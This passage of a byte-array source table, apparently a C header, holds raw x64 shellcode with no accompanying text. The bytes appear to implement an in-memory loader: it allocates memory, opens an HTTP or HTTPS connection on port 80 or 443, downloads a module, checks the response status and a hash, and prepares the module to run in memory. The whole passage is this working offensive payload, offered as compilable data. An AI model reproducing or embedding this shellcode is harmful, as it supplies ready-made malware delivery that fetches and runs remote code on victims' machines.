6 | 0x8b, 0x45, 0xe8, 0x49, 0x89, 0xc8, 0x48, 0x89, 0xc1, 0xe8, 0x7f, 0x34, | |
7 | 0x00, 0x00, 0x48, 0x89, 0x45, 0xd8, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x8b, | |
8 | 0x40, 0x50, 0x48, 0x89, 0x45, 0xe0, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x8b, | |
9 | 0x48, 0x28, 0x48, 0x8b, 0x55, 0xe0, 0x48, 0x8b, 0x45, 0xe8, 0x49, 0x89, | |
10 | 0xc8, 0x48, 0x89, 0xc1, 0xe8, 0x54, 0x34, 0x00, 0x00, 0x48, 0x89, 0x45, | |
11 | 0xd0, 0x48, 0x83, 0x7d, 0xd8, 0x00, 0x74, 0x07, 0x48, 0x83, 0x7d, 0xd0, | |
12 | 0x00, 0x75, 0x0a, 0xb8, 0xff, 0xff, 0xff, 0xff, 0xe9, 0xf5, 0x03, 0x00, | |
13 | 0x00, 0x48, 0x8b, 0x45, 0xe8, 0x8b, 0x00, 0x89, 0xc2, 0x48, 0x8b, 0x45, | |
14 | 0xd8, 0x41, 0xb9, 0x04, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x00, 0x30, 0x00, | |
15 | 0x00, 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89, 0x45, 0xc8, | |
16 | 0x48, 0x83, 0x7d, 0xc8, 0x00, 0x75, 0x0a, 0xb8, 0xff, 0xff, 0xff, 0xff, | |
17 | 0xe9, 0xc1, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xe8, 0x8b, 0x00, 0x89, | |
18 | 0xc2, 0x48, 0x8b, 0x45, 0xc8, 0x49, 0x89, 0xd0, 0x48, 0x8b, 0x55, 0x10, | |
19 | 0x48, 0x89, 0xc1, 0xe8, 0xf4, 0x38, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xc8, | |
20 | 0x48, 0x89, 0x45, 0xe8, 0x48, 0x8d, 0x85, 0x70, 0xff, 0xff, 0xff, 0x41, | |
21 | 0xb8, 0x40, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x48, 0x89, | |
22 | 0xc1, 0xe8, 0x8a, 0x38, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x05, | |
23 | 0x30, 0x02, 0x00, 0x00, 0x48, 0x89, 0x45, 0xc0, 0x48, 0x8b, 0x45, 0xe8, | |
24 | 0x8b, 0x00, 0x89, 0xc0, 0x4c, 0x8d, 0x80, 0xd0, 0xfd, 0xff, 0xff, 0x48, | |
25 | 0x8b, 0x45, 0xe8, 0x48, 0x8d, 0x50, 0x14, 0x48, 0x8b, 0x45, 0xe8, 0x48, | |
26 | 0x83, 0xc0, 0x04, 0x48, 0x8b, 0x4d, 0xc0, 0x4d, 0x89, 0xc1, 0x49, 0x89, | |
27 | 0xc8, 0x48, 0x89, 0xc1, 0xe8, 0x36, 0x3d, 0x00, 0x00, 0x48, 0x8b, 0x45, | |
28 | 0xe8, 0x48, 0x8b, 0x40, 0x28, 0x48, 0x8b, 0x55, 0xe8, 0x48, 0x8d, 0x8a, | |
29 | 0x18, 0x06, 0x00, 0x00, 0x48, 0x89, 0xc2, 0xe8, 0xfd, 0x39, 0x00, 0x00, | |
30 | 0x48, 0x89, 0x45, 0xb8, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x8b, 0x80, 0x18, | |
31 | 0x07, 0x00, 0x00, 0x48, 0x3b, 0x45, 0xb8, 0x0f, 0x85, 0x58, 0x02, 0x00, | |
32 | 0x00, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x8b, 0x48, 0x28, 0x48, 0x8b, 0x45, | |
33 | 0xe8, 0x48, 0x8b, 0x50, 0x30, 0x48, 0x8b, 0x45, 0xe8, 0x49, 0x89, 0xc8, | |
34 | 0x48, 0x89, 0xc1, 0xe8, 0x35, 0x33, 0x00, 0x00, 0x48, 0x89, 0xc2, 0x48, | |
35 | 0x8b, 0x45, 0xe8, 0x48, 0x89, 0x50, 0x30, 0x48, 0x8b, 0x45, 0xe8, 0x48, | |
36 | 0x8b, 0x40, 0x30, 0x48, 0x85, 0xc0, 0x75, 0x0a, 0xb8, 0xff, 0xff, 0xff, | |
37 | 0xff, 0xe9, 0xd0, 0x02, 0x00, 0x00, 0xc7, 0x45, 0xfc, 0x00, 0x00, 0x00, | |
38 | 0x00, 0xeb, 0x2a, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x8b, 0x40, 0x30, 0x8b, | |
39 | 0x55, 0xfc, 0x48, 0xc1, 0xe2, 0x05, 0x48, 0x8d, 0x8a, 0x30, 0x02, 0x00, | |
40 | 0x00, 0x48, 0x8b, 0x55, 0xe8, 0x48, 0x01, 0xca, 0x48, 0x83, 0xc2, 0x08, | |
41 | 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x83, 0x45, 0xfc, 0x01, 0x48, 0x8b, 0x45, | |
42 | 0xe8, 0x8b, 0x80, 0x34, 0x02, 0x00, 0x00, 0x3b, 0x45, 0xfc, 0x77, 0xc7, | |
43 | 0xc7, 0x45, 0xfc, 0x01, 0x00, 0x00, 0x00, 0xeb, 0x54, 0x48, 0x8b, 0x45, | |
44 | 0xe8, 0x48, 0x8b, 0x48, 0x28, 0x48, 0x8b, 0x45, 0xe8, 0x8b, 0x55, 0xfc, | |
45 | 0x48, 0x83, 0xc2, 0x06, 0x48, 0x8b, 0x14, 0xd0, 0x48, 0x8b, 0x45, 0xe8, | |
46 | 0x49, 0x89, 0xc8, 0x48, 0x89, 0xc1, 0xe8, 0xa2, 0x32, 0x00, 0x00, 0x48, | |
47 | 0x89, 0xc1, 0x48, 0x8b, 0x45, 0xe8, 0x8b, 0x55, 0xfc, 0x48, 0x83, 0xc2, | |
48 | 0x06, 0x48, 0x89, 0x0c, 0xd0, 0x48, 0x8b, 0x45, 0xe8, 0x8b, 0x55, 0xfc, | |
49 | 0x48, 0x83, 0xc2, 0x06, 0x48, 0x8b, 0x04, 0xd0, 0x48, 0x85, 0xc0, 0x0f, | |
50 | 0x84, 0x7f, 0x01, 0x00, 0x00, 0x83, 0x45, 0xfc, 0x01, 0x48, 0x8b, 0x45, | |
51 | 0xe8, 0x8b, 0x80, 0x30, 0x02, 0x00, 0x00, 0x3b, 0x45, 0xfc, 0x77, 0x9d, | |
52 | 0x48, 0x8b, 0x45, 0xe8, 0x8b, 0x80, 0x0c, 0x05, 0x00, 0x00, 0x83, 0xf8, | |
53 | 0x02, 0x75, 0x14, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x89, 0xc1, 0xe8, 0x10, | |
54 | 0x02, 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x84, 0x4c, 0x01, 0x00, 0x00, 0x48, | |
55 | 0x8b, 0x45, 0xe8, 0x8b, 0x80, 0x0c, 0x05, 0x00, 0x00, 0x83, 0xf8, 0x01, | |
56 | 0x75, 0x10, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x05, 0x48, 0x07, 0x00, 0x00, | |
57 | 0x48, 0x89, 0x45, 0xf0, 0xeb, 0x0f, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x8b, | |
58 | 0x80, 0x48, 0x07, 0x00, 0x00, 0x48, 0x89, 0x45, 0xf0, 0x48, 0x8b, 0x45, | |
59 | 0xe8, 0x8b, 0x80, 0x40, 0x03, 0x00, 0x00, 0x83, 0xf8, 0x01, 0x74, 0x50, | |
60 | 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x89, 0xc1, 0xe8, 0x09, 0x33, 0x00, 0x00, | |
61 | 0x89, 0x45, 0xb4, 0x83, 0x7d, 0xb4, 0x00, 0x75, 0x13, 0x48, 0x8b, 0x45, | |
62 | 0xe8, 0x8b, 0x80, 0x40, 0x03, 0x00, 0x00, 0x83, 0xf8, 0x02, 0x0f, 0x84, | |
63 | 0xea, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x89, 0xc1, 0xe8, | |
64 | 0xe8, 0x34, 0x00, 0x00, 0x89, 0x45, 0xb4, 0x83, 0x7d, 0xb4, 0x00, 0x75, | |
65 | 0x13, 0x48, 0x8b, 0x45, 0xe8, 0x8b, 0x80, 0x40, 0x03, 0x00, 0x00, 0x83, | |
66 | 0xf8, 0x02, 0x0f, 0x84, 0xc5, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xf0, | |
67 | 0x8b, 0x00, 0x83, 0xf8, 0x03, 0x74, 0x0b, 0x48, 0x8b, 0x45, 0xf0, 0x8b, | |
68 | 0x00, 0x83, 0xf8, 0x04, 0x75, 0x11, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x89, | |
69 | 0xc1, 0xe8, 0xf0, 0x12, 0x00, 0x00, 0xe9, 0x9f, 0x00, 0x00, 0x00, 0x48, | |
70 | 0x8b, 0x45, 0xf0, 0x8b, 0x00, 0x83, 0xf8, 0x01, 0x74, 0x0b, 0x48, 0x8b, | |
71 | 0x45, 0xf0, 0x8b, 0x00, 0x83, 0xf8, 0x02, 0x75, 0x3f, 0x48, 0x8d, 0x95, | |
72 | 0x70, 0xff, 0xff, 0xff, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x89, 0xc1, 0xe8, | |
73 | 0x5f, 0x06, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x13, 0x48, 0x8d, 0x95, 0x70, | |
74 | 0xff, 0xff, 0xff, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x89, 0xc1, 0xe8, 0x0c, | |
75 | 0x0a, 0x00, 0x00, 0x48, 0x8d, 0x95, 0x70, 0xff, 0xff, 0xff, 0x48, 0x8b, | |
76 | 0x45, 0xe8, 0x48, 0x89, 0xc1, 0xe8, 0x72, 0x10, 0x00, 0x00, 0xeb, 0x4a, | |
77 | 0x48, 0x8b, 0x45, 0xf0, 0x8b, 0x00, 0x83, 0xf8, 0x05, 0x74, 0x0b, 0x48, | |
78 | 0x8b, 0x45, 0xf0, 0x8b, 0x00, 0x83, 0xf8, 0x06, 0x75, 0x0e, 0x48, 0x8b, | |
79 | 0x45, 0xe8, 0x48, 0x89, 0xc1, 0xe8, 0x91, 0x1d, 0x00, 0x00, 0xeb, 0x26, | |
80 | 0x48, 0x8b, 0x45, 0xf0, 0x8b, 0x00, 0x83, 0xf8, 0x07, 0x75, 0x1b, 0x48, | |
81 | 0x8b, 0x45, 0xe8, 0x48, 0x89, 0xc1, 0xe8, 0x60, 0x1b, 0x00, 0x00, 0xeb, | |
82 | 0x0d, 0x90, 0xeb, 0x0a, 0x90, 0xeb, 0x07, 0x90, 0xeb, 0x04, 0x90, 0xeb, | |
83 | 0x01, 0x90, 0x48, 0x8b, 0x45, 0xe8, 0x8b, 0x80, 0x0c, 0x05, 0x00, 0x00, | |
84 | 0x83, 0xf8, 0x02, 0x75, 0x67, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x8b, 0x80, | |
85 | 0x48, 0x07, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x57, 0x48, 0x8b, 0x45, | |
86 | 0xe8, 0x48, 0x8b, 0x80, 0x40, 0x07, 0x00, 0x00, 0x89, 0xc2, 0x48, 0x8b, | |
87 | 0x45, 0xe8, 0x48, 0x8b, 0x80, 0x48, 0x07, 0x00, 0x00, 0x49, 0x89, 0xd0, | |
88 | 0xba, 0x00, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0x6b, 0x35, 0x00, | |
89 | 0x00, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x8b, 0x40, 0x50, 0x48, 0x8b, 0x55, | |
90 | 0xe8, 0x48, 0x8b, 0x8a, 0x48, 0x07, 0x00, 0x00, 0x41, 0xb8, 0x00, 0xc0, | |
91 | 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x8b, 0x45, | |
92 | 0xe8, 0x48, 0xc7, 0x80, 0x48, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, | |
93 | 0x48, 0x8b, 0x45, 0xe8, 0x8b, 0x00, 0x89, 0xc2, 0x48, 0x8b, 0x45, 0xe8, | |
94 | 0x49, 0x89, 0xd0, 0xba, 0x00, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, | |
95 | 0x20, 0x35, 0x00, 0x00, 0x48, 0x8b, 0x4d, 0xe8, 0x48, 0x8b, 0x45, 0xd0, | |
96 | 0x41, 0xb8, 0x00, 0xc0, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0xff, | |
97 | 0xd0, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x48, 0x81, 0xc4, 0xb0, 0x00, 0x00, | |
98 | 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x81, 0xec, 0x00, 0x03, 0x00, 0x00, 0x48, | |
99 | 0x8d, 0xac, 0x24, 0x80, 0x00, 0x00, 0x00, 0x48, 0x89, 0x8d, 0x90, 0x02, | |
100 | 0x00, 0x00, 0xc7, 0x85, 0x30, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, | |
101 | 0xc7, 0x85, 0x7c, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x85, | |
102 | 0x74, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x85, 0x78, 0x02, | |
103 | 0x00, 0x00, 0x00, 0x02, 0x60, 0x84, 0x48, 0x8d, 0x85, 0xc0, 0x01, 0x00, | |
104 | 0x00, 0x41, 0xb8, 0x68, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, | |
105 | 0x48, 0x89, 0xc1, 0xe8, 0xa4, 0x34, 0x00, 0x00, 0xc7, 0x85, 0xc0, 0x01, | |
106 | 0x00, 0x00, 0x68, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x85, 0xc0, 0x00, 0x00, | |
107 | 0x00, 0x48, 0x89, 0x85, 0xd8, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x45, 0xc0, | |
108 | 0x48, 0x89, 0x85, 0x08, 0x02, 0x00, 0x00, 0xc7, 0x85, 0xe0, 0x01, 0x00, | |
109 | 0x00, 0x00, 0x01, 0x00, 0x00, 0xc7, 0x85, 0x10, 0x02, 0x00, 0x00, 0x00, | |
110 | 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b, | |
111 | 0x80, 0xc8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x95, 0x90, 0x02, 0x00, 0x00, | |
112 | 0x48, 0x8d, 0x8a, 0x10, 0x05, 0x00, 0x00, 0x48, 0x8d, 0x95, 0xc0, 0x01, | |
113 | 0x00, 0x00, 0x49, 0x89, 0xd1, 0x41, 0xb8, 0x00, 0x00, 0x00, 0x10, 0xba, | |
114 | 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x85, 0xc0, 0x75, 0x0a, 0xb8, 0x00, | |
115 | 0x00, 0x00, 0x00, 0xe9, 0x5a, 0x04, 0x00, 0x00, 0x8b, 0x85, 0xd4, 0x01, | |
116 | 0x00, 0x00, 0x83, 0xf8, 0x04, 0x0f, 0x94, 0xc0, 0x0f, 0xb6, 0xc0, 0x89, | |
117 | 0x85, 0x74, 0x02, 0x00, 0x00, 0x83, 0xbd, 0x74, 0x02, 0x00, 0x00, 0x00, | |
118 | 0x74, 0x0a, 0x81, 0x8d, 0x78, 0x02, 0x00, 0x00, 0x00, 0x30, 0x80, 0x00, | |
119 | 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xd0, 0x00, | |
120 | 0x00, 0x00, 0xc7, 0x44, 0x24, 0x20, 0x00, 0x00, 0x00, 0x00, 0x41, 0xb9, | |
121 | 0x00, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xba, 0x00, | |
122 | 0x00, 0x00, 0x00, 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89, | |
123 | 0x85, 0x68, 0x02, 0x00, 0x00, 0x48, 0x83, 0xbd, 0x68, 0x02, 0x00, 0x00, | |
124 | 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0xe9, 0x03, 0x00, | |
125 | 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xd8, | |
126 | 0x00, 0x00, 0x00, 0x83, 0xbd, 0x74, 0x02, 0x00, 0x00, 0x00, 0x74, 0x08, | |
127 | 0x41, 0xb8, 0xbb, 0x01, 0x00, 0x00, 0xeb, 0x06, 0x41, 0xb8, 0x50, 0x00, | |
128 | 0x00, 0x00, 0x48, 0x8d, 0x95, 0xc0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x8d, | |
129 | 0x68, 0x02, 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24, 0x38, 0x00, 0x00, 0x00, | |
130 | 0x00, 0xc7, 0x44, 0x24, 0x30, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, | |
131 | 0x28, 0x03, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24, 0x20, 0x00, 0x00, | |
132 | 0x00, 0x00, 0x41, 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89, | |
133 | 0x85, 0x60, 0x02, 0x00, 0x00, 0x48, 0x83, 0xbd, 0x60, 0x02, 0x00, 0x00, | |
134 | 0x00, 0x0f, 0x84, 0xb1, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02, | |
135 | 0x00, 0x00, 0x48, 0x8b, 0x80, 0xf8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x95, | |
136 | 0x90, 0x02, 0x00, 0x00, 0x4c, 0x8d, 0x92, 0x10, 0x06, 0x00, 0x00, 0x4c, | |
137 | 0x8d, 0x45, 0xc0, 0x48, 0x8b, 0x8d, 0x60, 0x02, 0x00, 0x00, 0x48, 0xc7, | |
138 | 0x44, 0x24, 0x38, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x95, 0x78, 0x02, 0x00, | |
139 | 0x00, 0x89, 0x54, 0x24, 0x30, 0x48, 0xc7, 0x44, 0x24, 0x28, 0x00, 0x00, | |
140 | 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24, 0x20, 0x00, 0x00, 0x00, 0x00, 0x41, | |
141 | 0xb9, 0x00, 0x00, 0x00, 0x00, 0x4c, 0x89, 0xd2, 0xff, 0xd0, 0x48, 0x89, | |
142 | 0x85, 0x58, 0x02, 0x00, 0x00, 0x48, 0x83, 0xbd, 0x58, 0x02, 0x00, 0x00, | |
143 | 0x00, 0x0f, 0x84, 0x2b, 0x02, 0x00, 0x00, 0x83, 0xbd, 0x74, 0x02, 0x00, | |
144 | 0x00, 0x00, 0x74, 0x4f, 0x8b, 0x85, 0x78, 0x02, 0x00, 0x00, 0x25, 0x00, | |
145 | 0x10, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x40, 0xc7, 0x85, 0x54, 0x02, 0x00, | |
146 | 0x00, 0x04, 0x00, 0x00, 0x00, 0xc7, 0x85, 0x3c, 0x02, 0x00, 0x00, 0x80, | |
147 | 0x33, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b, | |
148 | 0x80, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x95, 0x3c, 0x02, 0x00, 0x00, | |
149 | 0x48, 0x8b, 0x8d, 0x58, 0x02, 0x00, 0x00, 0x41, 0xb9, 0x04, 0x00, 0x00, | |
150 | 0x00, 0x49, 0x89, 0xd0, 0xba, 0x1f, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, | |
151 | 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x00, 0x01, 0x00, | |
152 | 0x00, 0x48, 0x8b, 0x8d, 0x58, 0x02, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x20, | |
153 | 0x00, 0x00, 0x00, 0x00, 0x41, 0xb9, 0x00, 0x00, 0x00, 0x00, 0x41, 0xb8, | |
154 | 0x00, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x85, | |
155 | 0xc0, 0x0f, 0x84, 0x81, 0x01, 0x00, 0x00, 0xc7, 0x85, 0x34, 0x02, 0x00, | |
156 | 0x00, 0x04, 0x00, 0x00, 0x00, 0xc7, 0x85, 0x30, 0x02, 0x00, 0x00, 0x00, | |
157 | 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b, | |
158 | 0x80, 0x08, 0x01, 0x00, 0x00, 0x4c, 0x8d, 0x85, 0x34, 0x02, 0x00, 0x00, | |
159 | 0x48, 0x8d, 0x95, 0x30, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x8d, 0x58, 0x02, | |
160 | 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24, 0x20, 0x00, 0x00, 0x00, 0x00, 0x4d, | |
161 | 0x89, 0xc1, 0x49, 0x89, 0xd0, 0xba, 0x13, 0x00, 0x00, 0x20, 0xff, 0xd0, | |
162 | 0x85, 0xc0, 0x0f, 0x84, 0x2c, 0x01, 0x00, 0x00, 0x8b, 0x85, 0x30, 0x02, | |
163 | 0x00, 0x00, 0x3d, 0xc8, 0x00, 0x00, 0x00, 0x0f, 0x85, 0x1b, 0x01, 0x00, | |
164 | 0x00, 0xc7, 0x85, 0x34, 0x02, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x48, | |
165 | 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0xc7, 0x80, 0x40, 0x07, 0x00, | |
166 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, | |
167 | 0x48, 0x8b, 0x80, 0x08, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x95, 0x90, 0x02, | |
168 | 0x00, 0x00, 0x4c, 0x8d, 0x82, 0x40, 0x07, 0x00, 0x00, 0x48, 0x8d, 0x95, | |
169 | 0x34, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x8d, 0x58, 0x02, 0x00, 0x00, 0x48, | |
170 | 0xc7, 0x44, 0x24, 0x20, 0x00, 0x00, 0x00, 0x00, 0x49, 0x89, 0xd1, 0xba, | |
171 | 0x05, 0x00, 0x00, 0x20, 0xff, 0xd0, 0x85, 0xc0, 0x0f, 0x84, 0xba, 0x00, | |
172 | 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x80, | |
173 | 0x40, 0x07, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x0f, 0x84, 0xa3, 0x00, 0x00, | |
174 | 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x48, | |
175 | 0x48, 0x8b, 0x95, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x92, 0x40, 0x07, | |
176 | 0x00, 0x00, 0x41, 0xb9, 0x04, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x00, 0x30, | |
177 | 0x00, 0x00, 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89, 0xc2, | |
178 | 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x89, 0x90, 0x48, 0x07, | |
179 | 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x80, | |
180 | 0x48, 0x07, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x53, 0xc7, 0x85, 0x38, | |
181 | 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02, | |
182 | 0x00, 0x00, 0x48, 0x8b, 0x80, 0xe8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x95, | |
183 | 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x92, 0x40, 0x07, 0x00, 0x00, 0x41, | |
184 | 0x89, 0xd2, 0x48, 0x8b, 0x95, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x92, | |
185 | 0x48, 0x07, 0x00, 0x00, 0x4c, 0x8d, 0x85, 0x38, 0x02, 0x00, 0x00, 0x48, | |
186 | 0x8b, 0x8d, 0x58, 0x02, 0x00, 0x00, 0x4d, 0x89, 0xc1, 0x45, 0x89, 0xd0, | |
187 | 0xff, 0xd0, 0x89, 0x85, 0x7c, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90, | |
188 | 0x02, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xf0, 0x00, 0x00, 0x00, 0x48, 0x8b, | |
189 | 0x95, 0x58, 0x02, 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x8b, | |
190 | 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xf0, 0x00, 0x00, 0x00, | |
191 | 0x48, 0x8b, 0x95, 0x60, 0x02, 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff, 0xd0, | |
192 | 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xf0, 0x00, | |
193 | 0x00, 0x00, 0x48, 0x8b, 0x95, 0x68, 0x02, 0x00, 0x00, 0x48, 0x89, 0xd1, | |
194 | 0xff, 0xd0, 0x83, 0xbd, 0x7c, 0x02, 0x00, 0x00, 0x00, 0x0f, 0x84, 0x99, | |
195 | 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b, | |
196 | 0x80, 0x48, 0x07, 0x00, 0x00, 0x48, 0x89, 0x85, 0x48, 0x02, 0x00, 0x00, | |
197 | 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x4c, 0x8b, 0x80, 0x40, 0x07, | |
198 | 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8d, 0x90, | |
199 | 0x30, 0x07, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, | |
200 | 0x05, 0x20, 0x07, 0x00, 0x00, 0x48, 0x8b, 0x8d, 0x48, 0x02, 0x00, 0x00, | |
201 | 0x4d, 0x89, 0xc1, 0x49, 0x89, 0xc8, 0x48, 0x89, 0xc1, 0xe8, 0x09, 0x35, | |
202 | 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x40, | |
203 | 0x28, 0x48, 0x8b, 0x95, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8d, 0x8a, 0x18, | |
204 | 0x06, 0x00, 0x00, 0x48, 0x89, 0xc2, 0xe8, 0xca, 0x31, 0x00, 0x00, 0x48, | |
205 | 0x89, 0x85, 0x40, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x48, 0x02, 0x00, | |
206 | 0x00, 0x48, 0x8b, 0x80, 0x08, 0x19, 0x00, 0x00, 0x48, 0x3b, 0x85, 0x40, | |
207 | 0x02, 0x00, 0x00, 0x74, 0x07, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x06, | |
208 | 0x8b, 0x85, 0x7c, 0x02, 0x00, 0x00, 0x48, 0x81, 0xc4, 0x00, 0x03, 0x00, | |
209 | 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x70, 0x48, | |
210 | 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xc7, 0x45, 0xf4, 0x00, 0x00, | |
211 | 0x00, 0x00, 0xc7, 0x45, 0xec, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, | |
212 | 0x10, 0x8b, 0x80, 0x0c, 0x05, 0x00, 0x00, 0x83, 0xf8, 0x01, 0x75, 0x10, | |
213 | 0x48, 0x8b, 0x45, 0x10, 0x48, 0x05, 0x48, 0x07, 0x00, 0x00, 0x48, 0x89, | |
214 | 0x45, 0xf8, 0xeb, 0x0f, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x80, 0x48, | |
215 | 0x07, 0x00, 0x00, 0x48, 0x89, 0x45, 0xf8, 0x48, 0x8b, 0x45, 0x10, 0x48, | |
216 | 0x8b, 0x80, 0x18, 0x01, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x0f, 0x84, 0xf7, | |
217 | 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x80, 0x18, 0x01, | |
218 | 0x00, 0x00, 0x4c, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x81, | |
219 | 0xc2, 0x2c, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x4d, 0x10, 0x48, 0x81, 0xc1, | |
220 | 0x1c, 0x04, 0x00, 0x00, 0xff, 0xd0, 0x89, 0x45, 0xf4, 0x83, 0x7d, 0xf4, | |
221 | 0x00, 0x0f, 0x88, 0xb8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, | |
